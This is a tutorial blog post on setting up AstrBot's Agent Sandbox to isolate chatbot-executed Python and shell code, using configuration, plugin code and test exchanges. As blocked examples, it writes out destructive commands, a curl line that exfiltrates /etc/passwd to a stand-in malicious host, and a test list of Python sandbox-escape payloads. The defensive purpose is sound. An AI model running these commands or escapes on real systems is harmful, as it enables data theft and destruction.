How to Use AstrBot's Agent Sandbox for Safe Code Execution

Mar 4, 2026

Problem

When I built an AI chatbot that could execute Python code, I quickly ran into a scary realization: what if a user asks the bot to run os.system('rm -rf /') or to read sensitive files like /etc/passwd?

I tried using Python’s built-in exec() function:

def run_user_code(code: str):
    try:
        exec(code)
    except Exception as e:
        print(f"Error: {e}")

# A user sends this through my chatbot
run_user_code("import os; os.system('cat /etc/passwd')")

This is obviously dangerous. The code runs inside my bot's own process, with every privilege that process has on my server.

Why Sandboxing Matters

The core problem with unrestricted code execution is attack surface. A malicious user could:

Read sensitive files (credentials, config files)
Delete critical data
Make unauthorized network requests
Consume all system resources (fork bombs, memory exhaustion)
Pivot to other parts of the infrastructure

Language-level solutions like RestrictedPython only provide partial protection. They restrict some builtins and attributes, but the untrusted code still runs inside the host process, so a single gap in the filter (typically reached through Python's introspection machinery) is enough to escape.
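
To make the bypass concrete, here is a minimal sketch of the naive "strip the builtins" approach. It is my own illustration and not how RestrictedPython works; the helper name run_restricted is hypothetical. A plain import fails, yet the code can still walk from an empty tuple to the classes loaded in the interpreter:

```python
def run_restricted(code: str) -> dict:
    """Run code with an empty builtins table and return its namespace."""
    scope = {"__builtins__": {}}
    exec(code, scope)
    return scope


# A direct import is blocked because __import__ is no longer available.
try:
    run_restricted("import os")
    import_blocked = False
except ImportError:
    import_blocked = True

# Introspection needs no builtins: tuple -> object -> subclasses of object.
scope = run_restricted("classes = ().__class__.__base__.__subclasses__()")
leaked = scope["classes"]

print(import_blocked)   # True
print(len(leaked) > 0)  # True
```

Once the class list is reachable, an attacker only has to find one class in it that opens files or spawns processes.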

What I needed was true isolation - a separate environment where code runs with limited capabilities, and failures don’t affect the host system.
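
As a rough first step toward that idea, the sketch below runs the code in a separate interpreter process with a timeout, using only the standard library. The function name run_isolated and the result keys are my own choices for illustration. A child process on its own does not restrict the filesystem or the network, so this only shows the "failures stay in the child" part:

```python
import subprocess
import sys


def run_isolated(code: str, timeout: float = 5.0) -> dict:
    """Run code in a fresh interpreter process and capture its output."""
    try:
        completed = subprocess.run(
            # -I is isolated mode: ignores PYTHON* env vars and the user site dir
            [sys.executable, "-I", "-c", code],
            capture_output=True,
            text=True,
            timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        # subprocess.run kills the child before raising TimeoutExpired
        return {"output": "", "error": f"Timed out after {timeout} seconds"}
    if completed.returncode != 0:
        return {"output": completed.stdout, "error": completed.stderr.strip()}
    return {"output": completed.stdout, "error": None}


print(run_isolated("print(2 + 2)"))
print(run_isolated("while True: pass", timeout=1)["error"])
```

A hang or crash in the child no longer takes the bot down with it, which is the property the rest of this post builds on.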

What is AstrBot’s Agent Sandbox?

AstrBot is an open-source chatbot framework that includes a built-in Agent Sandbox feature. The sandbox provides isolated Python and shell execution environments for AI agents.

The architecture looks like this:

┌─────────────────────────────────────────────────────────────┐
│                     User/LLM Request                         │
└─────────────────────────┬───────────────────────────────────┘
                          │
                          ▼
┌─────────────────────────────────────────────────────────────┐
│                  Security Policy Check                       │
│  ┌─────────────────────────────────────────────────────┐   │
│  │ - Module whitelist/blacklist                         │   │
│  │ - Command validation                                 │   │
│  │ - Resource limit enforcement                         │   │
│  └─────────────────────────────────────────────────────┘   │
└─────────────────────────┬───────────────────────────────────┘
                          │
                          ▼
┌─────────────────────────────────────────────────────────────┐
│                   Isolated Runtime                          │
│  ┌─────────────────────────────────────────────────────┐   │
│  │ - Separate process/container                         │   │
│  │ - Limited filesystem access                          │   │
│  │ - Network restrictions                               │   │
│  │ - Memory/CPU/time limits                             │   │
│  └─────────────────────────────────────────────────────┘   │
└─────────────────────────┬───────────────────────────────────┘
                          │
                          ▼
┌─────────────────────────────────────────────────────────────┐
│                    Output Filter                             │
│  ┌─────────────────────────────────────────────────────┐   │
│  │ - Sanitize results                                   │   │
│  │ - Redact sensitive information                       │   │
│  └─────────────────────────────────────────────────────┘   │
└─────────────────────────┬───────────────────────────────────┘
                          │
                          ▼
┌─────────────────────────────────────────────────────────────┐
│                     Safe Result                              │
└─────────────────────────────────────────────────────────────┘
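
To give a feel for the last stage in the diagram, here is a small sketch of an output filter. It is not AstrBot's implementation; the pattern, the function name filter_output, and the max_chars default are assumptions chosen for illustration:

```python
import re

# Hypothetical pattern; a real deployment would tune this to its own secrets.
SECRET_PATTERN = re.compile(
    r"(?i)\b(password|passwd|secret|token|api[_-]?key)\b(\s*[=:]\s*)(\S+)"
)


def filter_output(text: str, max_chars: int = 2000) -> str:
    """Redact key=value style secrets, then cap the output length."""
    redacted = SECRET_PATTERN.sub(r"\1\2[REDACTED]", text)
    if len(redacted) > max_chars:
        redacted = redacted[:max_chars] + "\n[output truncated]"
    return redacted


print(filter_output("user=bob password=hunter2"))
```

Pattern-based redaction is best effort only. It catches obvious leaks but should not be the only thing standing between a secret and the user.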

Key capabilities:

Python execution: Run Python code with restricted module access
Shell execution: Execute shell commands with filtering
Session management: Maintain state across multiple code executions
Resource limits: Control memory, CPU, and execution time
Web ChatUI integration: Access sandbox through AstrBot’s web interface

Setting Up the Sandbox

Prerequisites

AstrBot installed (version 3.4.0 or later)
Python 3.8+
Docker (recommended for full isolation)

Installation

First, I cloned and installed AstrBot:

git clone https://github.com/Soulter/AstrBot.git
cd AstrBot
pip install -r requirements.txt

Enabling the Agent Sandbox

In the AstrBot configuration, I enabled the sandbox feature:

agent_sandbox:
  enabled: true
  backend: "docker"  # or "local" for process isolation
  security_policy:
    restricted_modules:
      - os
      - subprocess
      - socket
      - ctypes
      - sys
    memory_limit: "256m"
    cpu_limit: 1
    execution_timeout: 30
    network_access: "restricted"
    allowed_commands:
      - ls
      - cat
      - grep
      - python

The backend option determines the isolation level:

docker: Full container isolation (recommended)
local: Process-based isolation (lighter but less secure)

Executing Python Code Safely

Basic Code Execution

I created a simple plugin to execute user-provided Python code:

from astrbot.api.event import filter, AstrMessageEvent
from astrbot.api.star import Context, Star, register

@register("sandbox_executor", "author", "Safe code execution plugin", "1.0.0", "https://github.com/example")
class SandboxExecutorPlugin(Star):
    @filter.command("run")
    async def execute_code(self, event: AstrMessageEvent):
        # Extract code from message: /run print('hello')
        # Strip only the leading command, so "/run " inside the code is left alone
        code = event.get_plain_text().replace("/run ", "", 1)

        # Execute in sandbox
        result = await self.context.agent_sandbox.execute_python(code)

        if result.get("error"):
            yield event.plain_result(f"Error: {result['error']}")
        elif result.get("security_violations"):
            yield event.plain_result("Blocked: Security violation detected")
        else:
            yield event.plain_result(f"Output: {result['output']}")

When I tested with safe code:

User: /run print(2 + 2)
Bot: Output: 4

User: /run [x**2 for x in range(10)]
Bot: Output: [0, 1, 4, 9, 16, 25, 36, 49, 64, 81]

Handling Security Violations

When I tried to import restricted modules:

User: /run import os; os.system('whoami')
Bot: Blocked: Security violation detected

The sandbox detected the attempt to import os and blocked execution.
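
I don't know exactly how AstrBot performs this check internally, but a static import scan can be sketched with the standard ast module. The function name find_restricted_imports is hypothetical, and the module set mirrors the restricted_modules list from my config:

```python
import ast

RESTRICTED_MODULES = {"os", "subprocess", "socket", "ctypes", "sys"}


def find_restricted_imports(code: str) -> list:
    """Return the restricted top-level modules that the code imports."""
    violations = []
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        else:
            continue
        for name in names:
            root = name.split(".")[0]  # "os.path" counts as "os"
            if root in RESTRICTED_MODULES and root not in violations:
                violations.append(root)
    return violations


print(find_restricted_imports("import os; os.system('whoami')"))  # ['os']
print(find_restricted_imports("__import__('os')"))                # []
```

The second call shows the limit of a purely static scan: a dynamic import goes unnoticed, which is why this kind of check can only be one layer among several.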

I also tested what happens with resource exhaustion attempts:

# This tries to consume all memory
x = []
while True:
    x.append(' ' * 1000000)

The sandbox killed the process after hitting the memory limit:

User: /run x = []\nwhile True:\n    x.append(' ' * 1000000)
Bot: Error: Memory limit exceeded (256MB)
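
With the docker backend, I would expect the container runtime to enforce this limit. For a process-based setup, a comparable effect can be sketched on Unix with the standard resource module. This is an assumption-laden illustration rather than AstrBot's code: run_with_memory_limit is a hypothetical helper, it only works on Unix-like systems, and RLIMIT_AS caps virtual address space rather than resident memory:

```python
import resource
import subprocess
import sys


def run_with_memory_limit(code: str, max_bytes: int, timeout: float = 10.0):
    """Run code in a child interpreter whose address space is capped."""

    def apply_limit():
        # Runs in the child just before the interpreter starts.
        resource.setrlimit(resource.RLIMIT_AS, (max_bytes, max_bytes))

    return subprocess.run(
        [sys.executable, "-I", "-c", code],
        capture_output=True,
        text=True,
        timeout=timeout,
        preexec_fn=apply_limit,
    )


one_gib = 1024 ** 3
result = run_with_memory_limit("x = bytearray(2 * 1024 ** 3)", one_gib)
print(result.returncode != 0)  # the oversized allocation fails in the child
```

The child dies with a MemoryError while the parent keeps running, which matches the behavior I saw from the sandbox.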

Safe Shell Command Execution

The sandbox also supports shell command execution with filtering:

from astrbot.api.event import filter, AstrMessageEvent
from astrbot.api.star import Context, Star, register

@register("shell_executor", "author", "Shell command plugin", "1.0.0", "https://github.com/example")
class ShellExecutorPlugin(Star):
    @filter.command("shell")
    async def execute_shell(self, event: AstrMessageEvent):
        # Strip only the leading "/shell " so the rest of the command is untouched
        command = event.get_plain_text().replace("/shell ", "", 1)

        # Execute shell command in sandbox
        result = await self.context.agent_sandbox.execute_shell(command)

        if result.get("blocked"):
            yield event.plain_result(f"Blocked: {result['reason']}")
        elif result.get("error"):
            yield event.plain_result(f"Error: {result['error']}")
        else:
            yield event.plain_result(f"Output:\n{result['output']}")

Testing with allowed commands:

User: /shell ls -la
Bot: Output:
total 8
drwxr-xr-x 2 root root 4096 Mar  3 10:00 .
drwxr-xr-x 3 root root 4096 Mar  3 10:00 ..

But dangerous commands get blocked:

User: /shell rm -rf /
Bot: Blocked: Command 'rm' not in allowed list

User: /shell curl http://malicious-site.com/exfil?data=$(cat /etc/passwd)
Bot: Blocked: Command 'curl' not in allowed list
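
The filtering logic behind these responses is not something I have inspected, so the following is only a sketch of how an allowlist check could work. The names validate_command and SHELL_METACHARACTERS are hypothetical; the allowed set mirrors the allowed_commands list from my config:

```python
import shlex

ALLOWED_COMMANDS = {"ls", "cat", "grep", "python"}
SHELL_METACHARACTERS = set(";|&$`<>(){}\n")


def validate_command(command: str):
    """Return (argv, None) if the command is allowed, else (None, reason)."""
    try:
        argv = shlex.split(command)
    except ValueError as exc:  # e.g. unbalanced quotes
        return None, f"Could not parse command: {exc}"
    if not argv:
        return None, "Empty command"
    if argv[0] not in ALLOWED_COMMANDS:
        return None, f"Command '{argv[0]}' not in allowed list"
    # Reject chaining, pipes, and substitution even for allowed commands.
    if any(ch in SHELL_METACHARACTERS for ch in command):
        return None, "Shell metacharacters are not allowed"
    return argv, None


print(validate_command("ls -la"))
print(validate_command("rm -rf /"))
print(validate_command("cat notes.txt; rm notes.txt"))
```

Returning a parsed argv list makes it possible to run the command without a shell at all (for example with subprocess.run(argv)), so that metacharacters never get interpreted in the first place.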

Session-Level Resource Management

One powerful feature is session-based execution. This allows maintaining state across multiple code runs within a session.

Why Sessions Matter

Without sessions, each code execution starts fresh. But sometimes I need to:

Load a large dataset once, then query it multiple times
Train a model incrementally
Maintain variables across conversation turns

Using Sessions

from astrbot.api.event import filter, AstrMessageEvent
from astrbot.api.star import Context, Star, register

@register("session_executor", "author", "Session-based execution", "1.0.0", "https://github.com/example")
class SessionExecutorPlugin(Star):
    def __init__(self, context: Context):
        super().__init__(context)
        self.sessions = {}  # user_id -> session_id

    @filter.command("session_start")
    async def start_session(self, event: AstrMessageEvent):
        user_id = event.get_sender_id()

        # Create a new sandbox session
        session_id = await self.context.agent_sandbox.create_session(
            user_id=user_id,
            timeout=300,  # 5 minute session
            memory_limit="512m"
        )

        self.sessions[user_id] = session_id
        yield event.plain_result(f"Session started: {session_id[:8]}...")

    @filter.command("srun")
    async def execute_in_session(self, event: AstrMessageEvent):
        user_id = event.get_sender_id()
        session_id = self.sessions.get(user_id)

        if not session_id:
            yield event.plain_result("No active session. Use /session_start first.")
            return

        # Strip only the leading "/srun " so the code itself is untouched
        code = event.get_plain_text().replace("/srun ", "", 1)

        # Execute in existing session (state persists)
        result = await self.context.agent_sandbox.execute_python(
            code,
            session_id=session_id
        )

        yield event.plain_result(f"Output: {result.get('output', result.get('error'))}")

    @filter.command("session_end")
    async def end_session(self, event: AstrMessageEvent):
        user_id = event.get_sender_id()
        session_id = self.sessions.pop(user_id, None)

        if session_id:
            await self.context.agent_sandbox.destroy_session(session_id)
            yield event.plain_result("Session ended and resources cleaned up.")
        else:
            yield event.plain_result("No active session to end.")

A practical example - loading and analyzing data:

User: /session_start
Bot: Session started: a1b2c3d4...

User: /srun import pandas as pd
Bot: Output: None

User: /srun df = pd.read_csv('data.csv')  # Pre-uploaded file
Bot: Output: None

User: /srun df.head()
Bot: Output:
   id     name  value
0   1    Alice    100
1   2      Bob    200
2   3  Charlie    150

User: /srun df['value'].mean()
Bot: Output: 150.0

User: /session_end
Bot: Session ended and resources cleaned up.

The session kept df in memory across multiple executions.
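
Conceptually, this kind of persistence comes down to reusing one namespace across executions. The sketch below shows the idea in plain Python. It runs in-process with no isolation at all, so it illustrates state handling only; the Session class is my own stand-in, not AstrBot's session object:

```python
import ast


class Session:
    """Keeps one namespace alive across several code executions."""

    def __init__(self):
        self.namespace = {}

    def run(self, code: str):
        """Execute code; return the value of a trailing expression, if any."""
        tree = ast.parse(code)
        last_expr = None
        if tree.body and isinstance(tree.body[-1], ast.Expr):
            # Split off the final expression so its value can be returned.
            last_expr = ast.Expression(tree.body.pop().value)
        exec(compile(tree, "<session>", "exec"), self.namespace)
        if last_expr is None:
            return None
        return eval(compile(last_expr, "<session>", "eval"), self.namespace)


session = Session()
session.run("values = [100, 200, 150]")
print(session.run("sum(values) / len(values)"))  # 150.0
```

A new Session starts with an empty namespace, which is the "each execution starts fresh" behavior you get without sessions.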

Session Lifecycle

The session lifecycle follows this pattern:

┌────────────────┐
│ Create Session │ ──→ Allocate resources, assign session_id
└───────┬────────┘
        │
        ▼
┌────────────────┐
│ Execute Code   │ ──→ Run in session context (state persists)
└───────┬────────┘
        │
        ▼
┌────────────────┐
│ Execute More   │ ──→ Previous variables/functions available
└───────┬────────┘
        │
        ▼
┌────────────────┐
│ Destroy Session│ ──→ Clean up memory, release resources
└────────────────┘

Sessions automatically expire after the configured timeout, preventing resource leaks from abandoned sessions.
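
Expiry bookkeeping of this kind can be sketched with a small registry. I am assuming an idle timeout here (the clock resets on each use); whether AstrBot counts from creation or from last activity is something I have not verified. SessionRegistry and its methods are hypothetical names:

```python
import time
import uuid


class SessionRegistry:
    """Tracks sessions and drops the ones idle for longer than `timeout`."""

    def __init__(self, timeout: float = 300.0, clock=time.monotonic):
        self.timeout = timeout
        self.clock = clock  # injectable so tests can control time
        self._last_used = {}  # session_id -> timestamp of last activity

    def create(self) -> str:
        session_id = uuid.uuid4().hex
        self._last_used[session_id] = self.clock()
        return session_id

    def touch(self, session_id: str) -> bool:
        """Mark a session as active; False if it is unknown or expired."""
        self.expire()
        if session_id not in self._last_used:
            return False
        self._last_used[session_id] = self.clock()
        return True

    def expire(self) -> list:
        """Remove and return the IDs of sessions that have timed out."""
        now = self.clock()
        stale = [
            sid for sid, used in self._last_used.items()
            if now - used > self.timeout
        ]
        for sid in stale:
            del self._last_used[sid]
        return stale


registry = SessionRegistry(timeout=300)
sid = registry.create()
print(registry.touch(sid))  # True while the session is still fresh
```

In a real plugin, the IDs returned by expire() would be the ones to pass to the sandbox's cleanup call.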

Using the Sandbox via Web ChatUI

AstrBot includes a web interface that integrates with the sandbox. After starting AstrBot with the web plugin:

python main.py --web

The web interface is available at http://localhost:6185.

In the ChatUI, I can enable agent mode, which allows the AI to execute code through the sandbox. When the AI needs to run calculations or process data, it automatically uses the sandbox.

The ChatUI shows:

Code being executed
Output or errors
Execution time
Resource usage

This is useful for:

Quick data analysis tasks
Mathematical computations
File processing workflows

Advanced Security Configuration

Custom Module Restrictions

I can fine-tune which modules are allowed:

agent_sandbox:
  security_policy:
    # Completely block these modules
    restricted_modules:
      - os
      - subprocess
      - socket
      - ctypes
      - sys
      - importlib
      - builtins

    # Allow specific functions from otherwise restricted modules
    module_overrides:
      os.path:
        allowed: true
        functions:
          - join
          - basename
          - dirname
          - exists

    # Whitelist approach (more secure but restrictive)
    mode: "whitelist"
    allowed_modules:
      - math
      - json
      - re
      - datetime
      - collections
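
To show what a whitelist means at the Python level, here is a sketch that routes import statements through a guarded hook. It is an illustration under my own assumptions (guarded_import and run_with_allowlist are hypothetical names), and as discussed earlier it can be bypassed through introspection, so it is no substitute for container isolation:

```python
import builtins

ALLOWED_MODULES = {"math", "json", "re", "datetime", "collections"}


def guarded_import(name, globals=None, locals=None, fromlist=(), level=0):
    """Import hook that only lets allowlisted top-level modules through."""
    root = name.split(".")[0]
    if level != 0 or root not in ALLOWED_MODULES:
        raise ImportError(f"Module '{name}' is not in the allowed list")
    return builtins.__import__(name, globals, locals, fromlist, level)


def run_with_allowlist(code: str) -> dict:
    """Execute code whose import statements go through guarded_import."""
    safe_builtins = {
        "__import__": guarded_import,
        "print": print, "len": len, "range": range, "sum": sum,
    }
    scope = {"__builtins__": safe_builtins}
    exec(code, scope)
    return scope


scope = run_with_allowlist("import math\nresult = math.sqrt(16)")
print(scope["result"])  # 4.0
```

Allowed modules can still import whatever they need internally, because the hook only replaces the import machinery seen by the user's code.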

Network Access Control

For use cases requiring network access (like web search):

agent_sandbox:
  security_policy:
    network_access: "restricted"
    allowed_domains:
      - "api.openai.com"
      - "search.example.com"
    # Block all other network requests
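
A domain allowlist like this boils down to comparing the request's host against the configured names. The sketch below does that with urllib.parse; is_request_allowed is a hypothetical helper, and I am assuming exact host matches only (no wildcard subdomains):

```python
from urllib.parse import urlsplit

ALLOWED_DOMAINS = {"api.openai.com", "search.example.com"}


def is_request_allowed(url: str) -> bool:
    """Allow only http(s) URLs whose host exactly matches an allowed domain."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower()
    return host in ALLOWED_DOMAINS


print(is_request_allowed("https://api.openai.com/v1/models"))         # True
print(is_request_allowed("https://api.openai.com.evil.example/"))     # False
print(is_request_allowed("http://malicious-site.com/exfil?data=x"))   # False
```

Matching on the parsed hostname rather than on a substring of the URL avoids lookalike hosts and userinfo tricks. A check in application code is still advisory, so real enforcement belongs in the container's network configuration.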

Resource Limits

Adjust limits based on expected workload:

agent_sandbox:
  security_policy:
    memory_limit: "512m"    # Per execution
    cpu_limit: 2            # Number of CPU cores
    execution_timeout: 60   # Seconds
    max_output_size: "10m"  # Limit output size
    max_file_size: "100m"   # Limit file operations
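
Size strings such as "512m" need to become byte counts before they can be enforced. Here is a small sketch of that conversion. I am assuming Docker-style binary units (1m = 1024 * 1024 bytes); the helper name parse_size is hypothetical:

```python
import re

_UNITS = {"": 1, "k": 1024, "m": 1024 ** 2, "g": 1024 ** 3}


def parse_size(value: str) -> int:
    """Convert strings like "512m" or "10m" into a byte count."""
    match = re.fullmatch(r"(\d+)([kmg]?)b?", value.strip().lower())
    if match is None:
        raise ValueError(f"Unrecognized size: {value!r}")
    number, unit = match.groups()
    return int(number) * _UNITS[unit]


limits = {"memory_limit": "512m", "max_output_size": "10m", "max_file_size": "100m"}
for name, raw in limits.items():
    print(name, parse_size(raw))
```

Failing loudly on an unrecognized value is deliberate: a typo in a limit should stop startup rather than silently disable the limit.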

Best Practices

What I Learned the Hard Way

Start restrictive, then relax: Begin with a whitelist approach and add permissions as needed, rather than starting permissive and trying to tighten later.

Test with real attack patterns: I created a test suite with common attack vectors:

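# Each entry is a payload the sandbox must block; none should ever run on the host.
ATTACK_VECTORS = [
    # Direct import of a restricted module
    "import os; os.system('id')",
    # Dynamic import that a scan of import statements would miss
    "__import__('subprocess').call(['cat', '/etc/passwd'])",
    # Reading a sensitive file through open()
    "exec(open('/etc/passwd').read())",
    # Introspection escape; the subclass index (137 here) varies between Python builds
    "().__class__.__bases__[0].__subclasses__()[137]('id', shell=True).communicate()",
]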

Monitor resource usage: Even with limits, track CPU/memory trends to catch slow resource leaks.
Log everything: Security events, violations, and execution patterns help identify attack attempts.
Session cleanup is critical: Always implement session cleanup, especially for web applications where users might not explicitly end sessions.
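
A test suite like the one above is most useful when it reports which payloads get past a given check. The sketch below audits a deliberately naive substring filter; audit and naive_filter are hypothetical helpers, and the payload strings are only inspected, never executed:

```python
ATTACK_VECTORS = [
    "import os; os.system('id')",
    "__import__('subprocess').call(['cat', '/etc/passwd'])",
    "exec(open('/etc/passwd').read())",
    "().__class__.__bases__[0].__subclasses__()[137]('id', shell=True).communicate()",
]


def naive_filter(code: str) -> bool:
    """A weak check that only looks for two obvious substrings."""
    return "import os" in code or "subprocess" in code


def audit(vectors, is_blocked):
    """Return the payloads that the given check fails to block."""
    return [vector for vector in vectors if not is_blocked(vector)]


missed = audit(ATTACK_VECTORS, naive_filter)
print(len(missed))  # 2
```

Two of the four payloads slip through the substring filter. Swapping naive_filter for a call into the real sandbox turns the same loop into a regression test for the security policy.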

Common Mistakes

Relying only on module restrictions: Advanced attackers can use Python’s introspection to access blocked functionality. Always use container/process isolation as the primary defense.
Ignoring timeout configuration: A complex computation might hang indefinitely without proper timeout settings.
Allowing too many shell commands: Each allowed command is potential attack surface. The allowed_commands list should be minimal.
Not handling errors gracefully: Exposing internal error messages can leak system information. Sanitize error output.
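
For the last point, one way to sanitize errors is to show the exception type and a shortened message with filesystem paths removed. This is a sketch under my own assumptions: sanitize_error is a hypothetical helper, and the regular expression only targets absolute POSIX-style paths:

```python
import re

# Matches absolute POSIX paths such as /srv/bot/plugins/run.py
_PATH_PATTERN = re.compile(r"(?<![\w.])/(?:[\w.\-]+/)*[\w.\-]+")


def sanitize_error(exc: BaseException, max_chars: int = 200) -> str:
    """Build a user-facing message: exception type plus a path-free summary."""
    message = _PATH_PATTERN.sub("[path]", str(exc))
    if len(message) > max_chars:
        message = message[:max_chars] + "..."
    name = type(exc).__name__
    return f"{name}: {message}" if message else name


error = FileNotFoundError("No such file: /srv/bot/secrets/config.yaml")
print(sanitize_error(error))  # FileNotFoundError: No such file: [path]
```

The full traceback should still go to the server-side log, so debugging stays possible without showing internals to the user.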

The Reason

The key insight is that secure code execution requires multiple layers of defense:

Container/process isolation prevents direct system access
Module restrictions limit what the code can import
Resource limits prevent denial-of-service attacks
Command filtering controls shell execution
Session management prevents resource leaks

No single layer is sufficient, but together they provide strong protection.

Summary

In this post, I showed how to use AstrBot’s Agent Sandbox for secure code execution. I covered setting up the sandbox, executing Python and shell commands safely, managing sessions for stateful execution, and configuring security policies.

The key point is that sandboxing AI-generated code requires defense in depth - isolation, restrictions, limits, and monitoring all working together. AstrBot’s built-in sandbox provides these layers out of the box, making it easier to build secure AI agents.

Final Words + More Resources

My intention with this article was to share my knowledge and experience in the hope that it helps others. If you want to get in touch, you can contact me by email.
